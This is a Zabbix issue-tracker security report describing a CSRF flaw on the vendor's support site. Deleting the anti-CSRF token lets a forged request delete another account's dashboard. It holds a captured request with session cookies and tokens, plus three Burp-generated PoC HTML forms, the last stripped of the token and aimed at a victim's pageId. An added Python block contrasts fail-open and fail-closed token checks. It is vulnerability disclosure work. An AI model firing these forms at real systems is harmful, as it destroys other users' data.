ZABBIX BUGS AND ISSUES / ZBX-22436

CSRF leading to deletion of the victim's dashboard via token bypass


    • Type: Defect (Security)
    • Resolution: Unresolved
    • Priority: Trivial

      CSRF
      The web application does not, or can not, sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request.

      Steps To Reproduce:

      Create two test accounts.

        1. Go to the dashboard page, click on the create dashboard button and fill in a name for the dashboard.
        2. Do the same for the second account.
        3. After creating the dashboard, go to manage dashboard, click on the settings icon of the dashboard and click delete.
        4. You will have to capture the request; in my case I am using the Burp Suite tool.
        5. Capture the delete request, which will be as follows:

          GET /secure/DeletePortalPage!default.jspa?pageId=21293&atl_token=AMYF-O4GS-WBQS-UFB5_7cbfc4842048c480eac757b5d6567af5c0596931_lin&inline=true&decorator=dialog&_=1677646740700 HTTP/1.1
          Host: support.zabbix.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
          Accept: */*
          Accept-Language: en-US,en;q=0.5
          Accept-Encoding: gzip, deflate
          Referer: https://support.zabbix.com/secure/ConfigurePortalPages.jspa?view=favourites
          X-AUSERNAME: hack
          X-Requested-With: XMLHttpRequest
          Connection: close
          Cookie: zabbix_language=en; zbcfipc=IN; _ga_1F6WJN99ZG=GS1.1.1677644608.2.1.1677646741.0.0.0; _ga=GA1.1.1955293434.1677615394; _gid=GA1.2.1886669809.1677615395; ln_or=eyI2MzU2MjUiOiJkIn0%3D; atlassian.xsrf.token=AMYF-O4GS-WBQS-UFB5_7cbfc4842048c480eac757b5d6567af5c0596931_lin; JSESSIONID=CDC451C048B55E9BBC08847BA705066C; seraph.rememberme.cookie=104436%3Ad9035c0e7b8d0c250e8c063d05dc1620bff8050f
          Sec-Fetch-Dest: empty
          Sec-Fetch-Mode: cors
          Sec-Fetch-Site: same-origin

        6. Now go to Engagement tools in Burp Suite and click on "Generate CSRF PoC" for this request. The generated CSRF PoC will look like this:

          <html>
            <!-- CSRF PoC - generated by Burp Suite Professional -->
            <body>
              <script>history.pushState('', '', '/')</script>
              <form action="https://support.zabbix.com/secure/DeletePortalPage!default.jspa">
                <input type="hidden" name="pageId" value="21293" />
                <input type="hidden" name="atl_token" value="AMYF-O4GS-WBQS-UFB5_7cbfc4842048c480eac757b5d6567af5c0596931_lin" />
                <input type="hidden" name="inline" value="true" />
                <input type="hidden" name="decorator" value="dialog" />
                <input type="hidden" name="_" value="1677645852918" />
                <input type="submit" value="Submit request" />
              </form>
            </body>
          </html>
          
        7. As you can see, there is a token parameter, which we will bypass. Just remove the token parameter and the request will be as follows:
          <html>
            <!-- CSRF PoC - generated by Burp Suite Professional; atl_token parameter removed -->
            <body>
              <script>history.pushState('', '', '/')</script>
              <form action="https://support.zabbix.com/secure/DeletePortalPage!default.jspa">
                <input type="hidden" name="pageId" value="21293" />
                <input type="hidden" name="inline" value="true" />
                <input type="hidden" name="decorator" value="dialog" />
                <input type="hidden" name="_" value="1677645852918" />
                <input type="submit" value="Submit request" />
              </form>
            </body>
          </html>
         
        8. Save the CSRF PoC with the .html extension.
        9. Now the best part: the token is bypassed, and to delete the dashboard of the second account just change the pageId value to the value of the other account, i.e. 21295.
        (NOTE: this page id is the id of my second account.)

        10. Altered request:

          <html>
            <!-- CSRF PoC - generated by Burp Suite Professional; atl_token removed, pageId changed to the second account's dashboard -->
            <body>
              <script>history.pushState('', '', '/')</script>
              <form action="https://support.zabbix.com/secure/DeletePortalPage!default.jspa">
                <input type="hidden" name="pageId" value="21295" />
                <input type="hidden" name="inline" value="true" />
                <input type="hidden" name="decorator" value="dialog" />
                <input type="hidden" name="_" value="1677645852918" />
                <input type="submit" value="Submit request" />
              </form>
            </body>
          </html>

        11. Just open the CSRF PoC and submit the request. The token is bypassed and the dashboard of the victim's account will be deleted.

      Attachments:
        1. csrfpoc.png (56 kB)
        2. DeleteRequest.png (55 kB)
        3. recording-1677648223994.webm (13.59 MB)
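The bypass in steps 7 to 11 only works if the server compares the anti-CSRF token solely when the client sends one, i.e. the check fails open when the parameter is absent. The following is an added example written for this page; it is not code from the report, from Zabbix or from Atlassian. It models that fail-open check beside a fail-closed one and runs both over constructed requests that mirror the report's sequence (own page with token, token removed, token removed and pageId changed). The origin, token, cookie values and pageId numbers are all made up for the example.

```python
"""Added example, not part of the ZBX-22436 report or of any Atlassian/Zabbix
code: a minimal model of an anti-CSRF token check, first in the fail-open
form that the report's 'remove atl_token' step exploits, then in a
fail-closed form. All requests, cookie and token values are constructed."""
import hmac
from dataclasses import dataclass, field
from urllib.parse import parse_qs, urlsplit

SITE_ORIGIN = "https://tracker.example"         # assumed site, not support.zabbix.com
SESSION_TOKEN = "constructed-xsrf-token-0001"   # token the server issued to this session


@dataclass
class Request:
    method: str
    url: str
    cookies: dict
    body: dict = field(default_factory=dict)
    headers: dict = field(default_factory=dict)

    @property
    def params(self) -> dict:
        """Query string and form body merged, the way a web framework exposes them."""
        merged = {k: v[0] for k, v in parse_qs(urlsplit(self.url).query).items()}
        merged.update(self.body)
        return merged


def vulnerable_check(req: Request) -> bool:
    """Fail-open: the token is compared only when the client supplies one.
    Dropping atl_token skips the comparison, which is the bypass in the report."""
    expected = req.cookies.get("atlassian.xsrf.token", "")
    supplied = req.params.get("atl_token")
    if supplied is None:
        return True  # BUG: absence of the token is treated as success
    return hmac.compare_digest(supplied, expected)


def hardened_check(req: Request) -> bool:
    """Fail-closed: a state-changing request must be a POST carrying a token equal
    to the session's, and must not arrive from a cross-site context."""
    if req.method.upper() != "POST":
        return False  # a delete reachable via GET can be fired by any <img> or <form>
    expected = req.cookies.get("atlassian.xsrf.token")
    supplied = req.params.get("atl_token")
    if not expected or not supplied or not hmac.compare_digest(supplied, expected):
        return False  # missing or mismatching token: reject, never skip
    # Defence in depth: a cross-site form post announces itself through
    # Sec-Fetch-Site / Origin even if it somehow carries a valid token.
    # A missing Sec-Fetch-Site (older browsers) is not by itself a rejection.
    if req.headers.get("Sec-Fetch-Site", "same-origin") not in ("same-origin", "none"):
        return False
    origin = req.headers.get("Origin")
    if origin is not None and origin != SITE_ORIGIN:
        return False
    return True


def build_requests() -> dict:
    """The report's sequence re-created with constructed identifiers."""
    cookies = {"atlassian.xsrf.token": SESSION_TOKEN, "JSESSIONID": "constructed"}
    same = {"Sec-Fetch-Site": "same-origin", "Origin": SITE_ORIGIN}
    cross = {"Sec-Fetch-Site": "cross-site", "Origin": "https://attacker.example"}
    path = SITE_ORIGIN + "/secure/DeletePortalPage!default.jspa"
    return {
        # step 5: the captured delete, token present, own page
        "legit_get": Request("GET", f"{path}?pageId=1001&atl_token={SESSION_TOKEN}", cookies, headers=same),
        # step 7: same request with atl_token removed, served from the attacker's page
        "no_token_get": Request("GET", f"{path}?pageId=1001", cookies, headers=cross),
        # step 9: token removed and pageId pointed at another account's dashboard
        "no_token_other_page": Request("GET", f"{path}?pageId=1002", cookies, headers=cross),
        # what a correct client does: POST with the token, same origin
        "legit_post": Request("POST", path, cookies, {"pageId": "1001", "atl_token": SESSION_TOKEN}, same),
        # the PoC rewritten as a POST, still without the token
        "no_token_post": Request("POST", path, cookies, {"pageId": "1002"}, cross),
        # token present but posted from another site (would require a leaked token)
        "cross_site_post": Request("POST", path, cookies, {"pageId": "1002", "atl_token": SESSION_TOKEN}, cross),
    }


def accepted(check) -> dict:
    """Map each constructed request to whether the given check lets it through."""
    return {name: check(req) for name, req in build_requests().items()}


if __name__ == "__main__":
    for name, fn in (("vulnerable", vulnerable_check), ("hardened", hardened_check)):
        print(name, accepted(fn))
```

Running the block shows the fail-open check accepting every request, including the two with the token stripped, while the fail-closed check accepts only the same-origin POST that carries the session's token. Rejecting the GET form entirely is deliberate: an action that changes state on a GET cannot be protected by a token the browser is willing to omit, and the token must be required, not merely validated when present.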

      Assignee: Zabbix Development Team (zabbix.dev)
      Reporter: Huzaifa Fayaz Khalpe (huzaif)
      Votes: 0
      Watchers: 3